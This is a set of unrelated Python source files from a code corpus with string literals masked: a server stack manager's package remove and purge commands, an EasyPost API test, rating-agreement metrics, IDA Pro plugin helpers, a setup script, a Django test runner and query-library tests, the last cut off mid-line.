<EOL> for msg in self . msg : <EOL> Log . info ( self , Log . ENDC + msg ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> else : <EOL> return self . msg <EOL> @ expose ( help = "<STR_LIT>" ) <EOL> def remove ( self ) : <EOL> """<STR_LIT>""" <EOL> apt_packages = [ ] <EOL> packages = [ ] <EOL> if ( ( not self . app . pargs . web ) and ( not self . app . pargs . admin ) and <EOL> ( not self . app . pargs . mail ) and ( not self . app . pargs . nginx ) and <EOL> ( not self . app . pargs . php ) and ( not self . app . pargs . php7 ) and ( not self . app . pargs . mysql ) and <EOL> ( not self . app . pargs . postfix ) and ( not self . app . pargs . wpcli ) and <EOL> ( not self . app . pargs . phpmyadmin ) and ( not self . app . pargs . hhvm ) and <EOL> ( not self . app . pargs . adminer ) and ( not self . app . pargs . utils ) and <EOL> ( not self . app . pargs . mailscanner ) and ( not self . app . pargs . all ) and <EOL> ( not self . app . pargs . pagespeed ) and ( not self . app . pargs . redis ) and <EOL> ( not self . app . pargs . phpredisadmin ) and ( not self . app . pargs . nginxmainline ) ) : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> if self . app . pargs . all : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> self . app . pargs . mail = True <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> self . app . pargs . php7 = True <EOL> if self . app . pargs . web : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . wpcli = True <EOL> self . app . pargs . postfix = True <EOL> if self . app . pargs . admin : <EOL> self . app . pargs . adminer = True <EOL> self . app . pargs . phpmyadmin = True <EOL> self . app . pargs . utils = True <EOL> if self . app . pargs . mail : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mail <EOL> apt_packages = apt_packages + EEVariables . ee_mailscanner <EOL> packages = packages + [ "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEMysql . execute ( self , "<STR_LIT>" ) <EOL> EEMysql . execute ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . mailscanner : <EOL> apt_packages = ( apt_packages + EEVariables . ee_mailscanner ) <EOL> if self . app . pargs . pagespeed : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . nginx : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginxmainline : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> apt_packages = apt_packages + EEVariables . ee_php <EOL> if self . app . pargs . php7 : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_php7_0 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . hhvm : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_hhvm <EOL> if self . app . pargs . redis : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_redis <EOL> if self . app . pargs . mysql : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mysql <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . postfix : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_postfix <EOL> if self . app . pargs . wpcli : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> else : <EOL> Log . warn ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpmyadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . phpredisadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . adminer : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . utils : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if len ( packages ) or len ( apt_packages ) : <EOL> ee_prompt = input ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> if ( set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) or <EOL> set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) ) : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> if len ( packages ) : <EOL> EEFileUtils . remove ( self , packages ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if len ( apt_packages ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , apt_packages ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . remove ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> @ expose ( help = "<STR_LIT>" ) <EOL> def purge ( self ) : <EOL> """<STR_LIT>""" <EOL> apt_packages = [ ] <EOL> packages = [ ] <EOL> if ( ( not self . app . pargs . web ) and ( not self . app . pargs . admin ) and <EOL> ( not self . app . pargs . mail ) and ( not self . app . pargs . nginx ) and <EOL> ( not self . app . pargs . php ) and ( not self . app . pargs . php7 ) and ( not self . app . pargs . mysql ) and <EOL> ( not self . app . pargs . postfix ) and ( not self . app . pargs . wpcli ) and <EOL> ( not self . app . pargs . phpmyadmin ) and ( not self . app . pargs . hhvm ) and <EOL> ( not self . app . pargs . adminer ) and ( not self . app . pargs . utils ) and <EOL> ( not self . app . pargs . mailscanner ) and ( not self . app . pargs . all ) and <EOL> ( not self . app . pargs . pagespeed ) and ( not self . app . pargs . redis ) and <EOL> ( not self . app . pargs . phpredisadmin ) and ( not self . app . pargs . nginxmainline ) ) : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> if self . app . pargs . all : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> self . app . pargs . mail = True <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> self . app . pargs . php7 = True <EOL> if self . app . pargs . web : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . wpcli = True <EOL> self . app . pargs . postfix = True <EOL> if self . app . pargs . admin : <EOL> self . app . pargs . adminer = True <EOL> self . app . pargs . phpmyadmin = True <EOL> self . app . pargs . utils = True <EOL> if self . app . pargs . mail : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mail <EOL> apt_packages = apt_packages + EEVariables . ee_mailscanner <EOL> packages = packages + [ "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEMysql . execute ( self , "<STR_LIT>" ) <EOL> EEMysql . execute ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . mailscanner : <EOL> apt_packages = ( apt_packages + EEVariables . ee_mailscanner ) <EOL> if self . app . pargs . pagespeed : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . nginx : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginxmainline : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> apt_packages = apt_packages + EEVariables . ee_php <EOL> if self . app . pargs . php7 : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_php7_0 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . hhvm : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_hhvm <EOL> if self . app . pargs . redis : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_redis <EOL> if self . app . pargs . mysql : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mysql <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . postfix : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_postfix <EOL> if self . app . pargs . wpcli : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> else : <EOL> Log . warn ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpmyadmin : <EOL> packages = packages + [ '<STR_LIT>' . <EOL> format ( EEVariables . ee_webroot ) ] <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpredisadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . adminer : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . utils : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) <EOL> ] <EOL> if len ( packages ) or len ( apt_packages ) : <EOL> ee_prompt = input ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> if ( set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) or <EOL> set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) ) : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> if len ( apt_packages ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , apt_packages , purge = True ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if len ( packages ) : <EOL> EEFileUtils . remove ( self , packages ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . remove ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> def load ( app ) : <EOL> handler . register ( EEStackController ) <EOL> handler . register ( EEStackStatusController ) <EOL> handler . register ( EEStackMigrateController ) <EOL> handler . register ( EEStackUpgradeController ) <EOL> hook . register ( '<STR_LIT>' , ee_stack_hook ) </s>
<s> VERSION = '<STR_LIT>' </s>
<s> import unittest <EOL> import easypost <EOL> from constants import API_KEY as api_key <EOL> easypost . api_key = api_key <EOL> class UserTests ( unittest . TestCase ) : <EOL> def test_child_user_create ( self ) : <EOL> easypost . api_key = "<STR_LIT>" <EOL> child_user = easypost . User . create ( <EOL> name = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> password_confirmation = '<STR_LIT>' , <EOL> ) <EOL> child_id = child_user . id <EOL> assert child_id is not None <EOL> retrieved_user = easypost . User . retrieve ( child_id ) <EOL> assert retrieved_user . id == child_id <EOL> assert retrieved_user . name == '<STR_LIT>' <EOL> new_name = '<STR_LIT>' <EOL> retrieved_user . name = new_name <EOL> retrieved_user . save ( ) <EOL> updated_user = easypost . User . retrieve ( child_id ) <EOL> assert updated_user . id == child_id <EOL> assert updated_user . name == '<STR_LIT>' <EOL> easypost . api_key = api_key <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , unicode_literals <EOL> import logging <EOL> import numpy as np <EOL> from scipy . stats import kendalltau , spearmanr , pearsonr <EOL> from six import string_types <EOL> from six . moves import xrange as range <EOL> from sklearn . metrics import confusion_matrix , f1_score , SCORERS <EOL> _CORRELATION_METRICS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def kappa ( y_true , y_pred , weights = None , allow_off_by_one = False ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ ) <EOL> assert ( len ( y_true ) == len ( y_pred ) ) <EOL> try : <EOL> y_true = [ int ( np . round ( float ( y ) ) ) for y in y_true ] <EOL> y_pred = [ int ( np . round ( float ( y ) ) ) for y in y_pred ] <EOL> except ValueError as e : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise e <EOL> min_rating = min ( min ( y_true ) , min ( y_pred ) ) <EOL> max_rating = max ( max ( y_true ) , max ( y_pred ) ) <EOL> y_true = [ y - min_rating for y in y_true ] <EOL> y_pred = [ y - min_rating for y in y_pred ] <EOL> num_ratings = max_rating - min_rating + <NUM_LIT:1> <EOL> observed = confusion_matrix ( y_true , y_pred , <EOL> labels = list ( range ( num_ratings ) ) ) <EOL> num_scored_items = float ( len ( y_true ) ) <EOL> if isinstance ( weights , string_types ) : <EOL> wt_scheme = weights <EOL> weights = None <EOL> else : <EOL> wt_scheme = '<STR_LIT>' <EOL> if weights is None : <EOL> weights = np . empty ( ( num_ratings , num_ratings ) ) <EOL> for i in range ( num_ratings ) : <EOL> for j in range ( num_ratings ) : <EOL> diff = abs ( i - j ) <EOL> if allow_off_by_one and diff : <EOL> diff -= <NUM_LIT:1> <EOL> if wt_scheme == '<STR_LIT>' : <EOL> weights [ i , j ] = diff <EOL> elif wt_scheme == '<STR_LIT>' : <EOL> weights [ i , j ] = diff ** <NUM_LIT:2> <EOL> elif not wt_scheme : <EOL> weights [ i , j ] = bool ( diff ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( wt_scheme ) ) <EOL> hist_true = np . bincount ( y_true , minlength = num_ratings ) <EOL> hist_true = hist_true [ : num_ratings ] / num_scored_items <EOL> hist_pred = np . bincount ( y_pred , minlength = num_ratings ) <EOL> hist_pred = hist_pred [ : num_ratings ] / num_scored_items <EOL> expected = np . outer ( hist_true , hist_pred ) <EOL> observed = observed / num_scored_items <EOL> k = <NUM_LIT:1.0> <EOL> if np . count_nonzero ( weights ) : <EOL> k -= ( sum ( sum ( weights * observed ) ) / sum ( sum ( weights * expected ) ) ) <EOL> return k <EOL> def kendall_tau ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> ret_score = kendalltau ( y_true , y_pred ) [ <NUM_LIT:0> ] <EOL> return ret_score if not np . isnan ( ret_score ) else <NUM_LIT:0.0> <EOL> def spearman ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> ret_score = spearmanr ( y_true , y_pred ) [ <NUM_LIT:0> ] <EOL> return ret_score if not np . isnan ( ret_score ) else <NUM_LIT:0.0> <EOL> def pearson ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> ret_score = pearsonr ( y_true , y_pred ) [ <NUM_LIT:0> ] <EOL> return ret_score if not np . isnan ( ret_score ) else <NUM_LIT:0.0> <EOL> def f1_score_least_frequent ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> least_frequent = np . bincount ( y_true ) . argmin ( ) <EOL> return f1_score ( y_true , y_pred , average = None ) [ least_frequent ] <EOL> def use_score_func ( func_name , y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> scorer = SCORERS [ func_name ] <EOL> return scorer . _sign * scorer . _score_func ( y_true , y_pred , ** scorer . _kwargs ) </s>
<s> from idaapi import PluginForm <EOL> from PySide import QtGui , QtCore <EOL> class MyPluginFormClass ( PluginForm ) : <EOL> def OnCreate ( self , form ) : <EOL> """<STR_LIT>""" <EOL> self . parent = self . FormToPySideWidget ( form ) <EOL> self . PopulateForm ( ) <EOL> def PopulateForm ( self ) : <EOL> layout = QtGui . QVBoxLayout ( ) <EOL> layout . addWidget ( <EOL> QtGui . QLabel ( "<STR_LIT>" ) ) <EOL> layout . addWidget ( <EOL> QtGui . QLabel ( "<STR_LIT>" ) ) <EOL> self . parent . setLayout ( layout ) <EOL> def OnClose ( self , form ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> plg = MyPluginFormClass ( ) <EOL> plg . Show ( "<STR_LIT>" ) </s>
<s> class BasicBlock ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , bb , fc ) : <EOL> self . _fc = fc <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . startEA = bb . startEA <EOL> """<STR_LIT>""" <EOL> self . endEA = bb . endEA <EOL> """<STR_LIT>""" <EOL> self . type = self . _fc . _q . calc_block_type ( self . id ) <EOL> """<STR_LIT>""" <EOL> def preds ( self ) : <EOL> """<STR_LIT>""" <EOL> q = self . _fc . _q <EOL> for i in xrange ( <NUM_LIT:0> , self . _fc . _q . npred ( self . id ) ) : <EOL> yield self . _fc [ q . pred ( self . id , i ) ] <EOL> def succs ( self ) : <EOL> """<STR_LIT>""" <EOL> q = self . _fc . _q <EOL> for i in xrange ( <NUM_LIT:0> , q . nsucc ( self . id ) ) : <EOL> yield self . _fc [ q . succ ( self . id , i ) ] <EOL> class FlowChart ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , f = None , bounds = None , flags = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if ( f is None ) and ( bounds is None or type ( bounds ) != types . TupleType ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if bounds is None : <EOL> bounds = ( BADADDR , BADADDR ) <EOL> self . _q = qflow_chart_t ( "<STR_LIT>" , f , bounds [ <NUM_LIT:0> ] , bounds [ <NUM_LIT:1> ] , flags ) <EOL> size = property ( lambda self : self . _q . size ( ) ) <EOL> """<STR_LIT>""" <EOL> def refresh ( ) : <EOL> """<STR_LIT>""" <EOL> self . _q . refresh ( ) <EOL> def _getitem ( self , index ) : <EOL> return BasicBlock ( index , self . _q [ index ] , self ) <EOL> def __iter__ ( self ) : <EOL> return ( self . _getitem ( index ) for index in xrange ( <NUM_LIT:0> , self . size ) ) <EOL> def __getitem__ ( self , index ) : <EOL> """<STR_LIT>""" <EOL> if index >= self . size : <EOL> raise KeyError <EOL> else : <EOL> return self . _getitem ( index ) </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> import string <EOL> def random_string ( random_length = None ) : <EOL> """<STR_LIT>""" <EOL> choices = string . letters + '<STR_LIT:U+0020>' <EOL> text = [ ] <EOL> if not random_length : <EOL> random_length = random . randint ( <NUM_LIT:1> , <NUM_LIT:30> ) <EOL> for x in range ( random_length ) : <EOL> text . append ( random . choice ( choices ) ) <EOL> return "<STR_LIT>" . join ( text ) </s>
<s> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> import sys , os <EOL> sys . path . append ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> try : <EOL> from django . conf import settings <EOL> from tests import settings as test_settings <EOL> settings . configure ( default_settings = test_settings ) <EOL> try : <EOL> import django <EOL> setup = django . setup <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> setup ( ) <EOL> from django_nose import NoseTestSuiteRunner <EOL> except ImportError : <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> import logging <EOL> logging . disable ( logging . WARNING ) <EOL> logging . captureWarnings ( True ) <EOL> def run_tests ( * test_args ) : <EOL> if not test_args : <EOL> test_args = [ '<STR_LIT>' ] <EOL> test_runner = NoseTestSuiteRunner ( verbosity = <NUM_LIT:1> ) <EOL> failures = test_runner . run_tests ( test_args ) <EOL> if failures : <EOL> sys . exit ( failures ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run_tests ( * sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> import sys <EOL> import unittest <EOL> import lifter . models <EOL> class TestObject ( object ) : <EOL> def __init__ ( self , name , ** kwargs ) : <EOL> self . name = name <EOL> for key , value in kwargs . items ( ) : <EOL> setattr ( self , key , value ) <EOL> def __repr__ ( self ) : <EOL> return self . name <EOL> class TestBase ( unittest . TestCase ) : <EOL> PARENTS = [ <EOL> TestObject ( name = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' ) , <EOL> ] <EOL> OBJECTS = [ <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:2> , a = <NUM_LIT:1> , parent = PARENTS [ <NUM_LIT:0> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:3> , a = <NUM_LIT:1> , parent = PARENTS [ <NUM_LIT:0> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:1> , a = <NUM_LIT:2> , parent = PARENTS [ <NUM_LIT:1> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:4> , a = <NUM_LIT:2> , parent = PARENTS [ <NUM_LIT:1> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> ] <EOL> DICTS = [ o . __dict__ for o in OBJECTS ] <EOL> def setUp ( self ) : <EOL> self . manager = lifter . load ( self . OBJECTS ) <EOL> self . dict_manager = lifter . load ( self . DICTS ) <EOL> class TestQueries ( TestBase ) : <EOL> def test_default_order ( self ) : <EOL> self . assertEqual ( list ( self . manager . all ( ) ) , self . OBJECTS ) <EOL> self . assertEqual ( list ( self . dict_manager . all ( ) ) , self . DICTS ) <EOL> def test_can_get_using_attribute ( self ) : <EOL> self . assertEqual ( self . manager . all ( ) . get ( name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( self . dict_manager . all ( ) . get ( name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:0> ] ) <EOL> def test_can_filter ( self ) : <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) , self . OBJECTS [ : <NUM_LIT:2> ] ) <EOL> def test_can_combine_filters ( self ) : <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> , name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . filter ( name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> , name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . filter ( name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> def test_related_lookups ( self ) : <EOL> self . assertEqual ( self . manager . filter ( parent__name = '<STR_LIT>' ) , self . OBJECTS [ : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . exclude ( parent__name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:2> : ] ) <EOL> self . assertEqual ( self . manager . all ( ) . get ( parent__name = '<STR_LIT>' , order = <NUM_LIT:2> ) , self . OBJECTS [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( parent__name = '<STR_LIT>' ) , self . DICTS [ : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( parent__name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:2> : ] ) <EOL> self . assertEqual ( self . dict_manager . all ( ) . get ( parent__name = '<STR_LIT>' , order = <NUM_LIT:2> ) , self . DICTS [ <NUM_LIT:0> ] ) <EOL> def test_exception_raised_on_missing_attr ( self ) : <EOL> with self . assertRaises ( lifter . exceptions . MissingAttribute ) : <EOL> self . manager . filter ( x = "<STR_LIT:y>" ) . count ( ) <EOL> with self . assertRaises ( lifter . exceptions . MissingAttribute ) : <EOL> self . dict_manager . filter ( x = "<STR_LIT:y>" ) . count ( ) <EOL> def test_can_exclude ( self ) : <EOL> self . assertEqual ( self . manager . exclude ( a = <NUM_LIT:1> ) , self . OBJECTS [ <NUM_LIT:2> : ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( a = <NUM_LIT:1> ) , self . DICTS [ <NUM_LIT:2> : ] ) <EOL> def test_can_combine_exclude ( self ) : <EOL> self . assertEqual ( self . manager . exclude ( a = <NUM_LIT:1> ) . exclude ( name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:2> : 